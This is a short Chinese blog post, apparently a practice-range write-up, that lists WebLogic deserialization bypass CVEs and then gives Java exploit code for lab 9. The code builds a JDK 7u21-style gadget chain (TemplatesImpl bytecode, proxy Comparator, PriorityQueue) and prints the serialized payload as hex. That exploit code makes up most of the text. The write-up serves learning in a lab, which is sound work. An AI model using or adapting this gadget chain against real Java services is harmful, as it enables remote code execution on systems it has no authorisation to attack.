最近复习下java一些基础,有些忘了,找到了个网上的靶场,适合我这种新手练习
lab6-8
感觉就是对应Weblogic这几个绕过
CVE-2015-4852->CVE-2016-0638->CVE-2016-3510->CVE-2017-3248->CVE-2018-2628->CVE-2018-2893->CVE-2018-????。感兴趣自己可以搜来看下,基本都差不多
lab9
最先开始我没意识到是7u21的改写。后面做了又回去复习了java漫谈才想起来
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
| package Payload;
import Utils.Encode;
import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import javax.xml.transform.Templates;
import java.lang.reflect.Field;
import java.lang.reflect.Proxy;
import java.math.BigInteger;
import java.util.Comparator;
import java.util.PriorityQueue;
public class exp {
public static void main(String[] args) throws Exception{
TemplatesImpl tmpl = new TemplatesImpl();
Field bytecodes = Reflections.getField(tmpl.getClass(),"_bytecodes");
Reflections.setAccessible(bytecodes);
Reflections.setFieldValue(tmpl,"_bytecodes",new byte[][]{SerializeUtil.getTemplatesImpl("xxxxxx")});
Field name=Reflections.getField(tmpl.getClass(),"_name");
Reflections.setAccessible(name);
Reflections.setFieldValue(tmpl,"_name","s");
Reflections.setFieldValue(tmpl, "_tfactory", new TransformerFactoryImpl());
MyInvocationHandler s = new MyInvocationHandler(Templates.class);
Comparator comparator = (Comparator) Proxy.newProxyInstance(exp7.class.getClassLoader(), new Class[]{ Comparator.class },s);
PriorityQueue<Object> queue = new PriorityQueue(2);
queue.add(new BigInteger("1"));
queue.add(new BigInteger("2"));
Object[] queueArray = (Object[])((Object[]) marshalsec.util.Reflections.getFieldValue(queue, "queue"));
queueArray[0] = tmpl;
Field field = Class.forName("java.util.PriorityQueue").getDeclaredField("comparator");
field.setAccessible(true);
field.set(queue, comparator);
System.out.print(Encode.objectToHexString(queue));
}
}
|
